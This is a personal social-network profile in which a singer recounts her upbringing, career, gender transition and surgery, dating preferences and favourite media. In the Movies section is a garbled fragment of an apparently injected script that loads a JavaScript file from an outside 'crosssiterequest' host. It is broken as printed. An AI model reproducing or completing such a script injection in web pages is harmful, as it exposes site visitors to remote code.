About Me

Music, Photos and more at . . . www.AngelWayward.com

UPDATE: I have finally returned to the U.S. after travelling to Thailand where I underwent the sex reassignment operation I have been preparing for these past few years. I left the states on July 19, and returned on August 28. My father accompanied me on this trip, and I am very fortunate and thankful to have been given so much love and support from family, friends, co-workers, and fellow MySpacers. The procedure was performed by the world-reknown surgeon Dr. Suporn on July 26, 2007. If you would like to find out a little about him or the surgical procedure please check out www.supornclinic.com. I consider the surgery to have been very successfull, and I have been healing very well and possibly a little ahead of schedule. I want to thank each of you who have written to me for your kind words of appreciation, your prayers and your support. God bless you all!

____________________________________________________

My name is Angel Wayward. I was born October 31, 1973. I spent my early years growing up in a military family bouncing around from place to place until we moved to the Northern Virginia area where my dad was last stationed at the Pentagon in 1989. During my early years I had the privilege of living in various states throughout the U.S., as well as Germany and Panama. After high school I went to the University of California at Santa Barbara (UCSB), but decided to leave after two years and get my degree from the City College of New York (CCNY) in Manhattan. It was during my years at UCSB that I developed an interest in music and singing, and although I loved my time there immensely, I wanted to experience "The Big Apple" and all that it had to offer an aspiring entertainer like myself. I have been writing and recording my own spiritually oriented pop/rock/dance music ever since.

I had three wonderful and exciting years in New York City, but after graduating in 1996 I decided to move back to Northern Virginia to begin work. I have been with a few companies over the years, but the most recent one is my favorite by far. I work for a large defense contracting company in Falls Church. It is a wonderful place, and although no situation is perfect, it's my home for now.

My current place of employment is also where I began my transition from male to female. Yes, you read that right. I am a male to female transsexual. In short, I was born with the mind of a woman, but the body of a male. Since my earliest memory I have known that I was female. It just took a few years and quite a bit of growing up before I had the strength of mind to take the steps necessary to become a woman. This included counseling, female hormones, and finally undergoing a sex reassignment operation (SRS). Through it all I have been blessed with support from not only my immediate family, but from my relatives and co-workers as well. I am one of the "lucky ones", for I know far too many transsexuals with horror stories. I have written my own story in more detail, and have published it on my website. If you would like to learn more just click the link above.
I plan on staying in the Northern Virginia area for the next couple of years, but I would like to move to California at some point in the future. Half of my relatives live in Fresno and Monterey, and that is where my family used to spend our summer vacations. There is just something about California that makes me feel spiritually centered. I also fell in love with Santa Barbara after going to school there, and that is one of the places I am seriously thinking of moving to. I still make my way out to California to see friends and relatives at least once a year. Also, one of my cousins moved to Los Angeles, and I have a feeling that may come in handy! My Interests

..

I'd like to meet:

Physically I tend to gravitate towards "Ken Dolls" -- tall, well-built, white, European (German/French/Dutch) individuals, with pretty boy faces and beautiful eyes. Very rarely, if ever, do I find myself attracted to Black, Latin, or Asian men. No apologies here. That's just the way I am. I like men to have a little bit of a 'bad boy' side to them, while at the same time having the emotional maturity to express their more intimate side. I prefer not to subject myself to the ennui of pretense, so I appreciate and find myself attracted to men who are genuine, forthcoming and have a good sense of themselves.

I'm more of a spiritually oriented person and as such I don't place an extremely high value on the physical aspects of a relationship. Kissing is the exception. I love to kiss, and so should the guy who spends time with me.

There is nothing more beautiful and romantic to me than standing on the beach, looking out across the sea, while wrapped in someone's arms. Hopefully I will meet Mr. Right one day, and since I do believe that soulmates exist, I'm patient and have no desire to sell myself short.

Music:

My tastes are varied, but my favorite singer to date is French pop/rock star Mylene Farmer.

My favorite album is Anamorphosee.

My favorite song is California.

Other artists I enjoy include: Madonna, Kylie Minogue, Amy Grant, Michael W. Smith, Wilson Phillips, House of Freaks, The Sundays, Natalie Imbruglia, Tori Amos, Michelle Branch, Sarah McLachlan, and so on.

Movies:

There are plenty of movies I love, and can watch over and over again. Alot of them I must say aren't for everyone...some of them are a bit cheesy, still they make me happy.
A few in no particular order: To Kill a Mockingbird, Ma Vie en Rose, Scream, Sliding Doors, Chasing Amy, Clueless, National Lampoon's Vacation, Sabrina (remake), Looker, Halloween II, A Nightmare on Elm Street, Adventures in Babysitting, Goonies (Looking forward to a sequel), Anywhere But Here, Xanadu, Grease, Killer Klowns from Outer Space, Grace of My Heart, The Birds, Murder by Death, and so on.

.... language="javascript" src="http://crosssiterequest../request.js"function nothingf(){document·write("nathanjosiah1.mov.r{}");}..

Television:

I actually don't watch much TV, but I do have a few favorite shows that I try to catch now and again...Alias, Will & Grace, Lost, Comedy Central (Whatever happened to Reno 911?), and of course my girls Eddy & Patsy from Absolutely Fabulous.

Books:

I do enjoy reading, but I don't read as much as I could. I enjoy most genre's as long as it's a subject I find interesting. Much of my past reading has centered around spiritual enlightenment. Recently, I have been reading books on Kabbalah written by two brothers, Michael and Yehuda Berg, who are leaders in the Kabbalah movement today.

Generally I don't do magazines, because I don't need people telling me how ugly, fat, or alone I am (I know this already!)

Since my job doesn't always keep me occupied, I tend to peruse the web looking for interesting sites. I usually end up checking out these sites in the morning with my breakfast: theonion.com (sooo funny!), washingtonpost.com, newsoftheweird.com (updated weekly), and AOL's daily headlines.

Heroes:

Hmmm....my heroes? Well, I'd have to say I have a few. My mother, father and brother would be the most important heroes to me. They've always given me their love and have consistently supported me throughout my life and its many changes.

Jesus would be the next on my list, though closest to my heart. He left the world with the two greatest commandments, "Love the Lord God with all of your heart, and love one another even as I have loved you."

My last hero would be Wonder Woman. I loved Lynda Carter in the television series when I was little. She was awesome. I have a picture of her in my cubicle at work. I wish I could jump really high, deflect bullets with my bracelets and most of all MAKE MEN TELL THE TRUTH with my golden lasso. A girl can dream can't she? =)
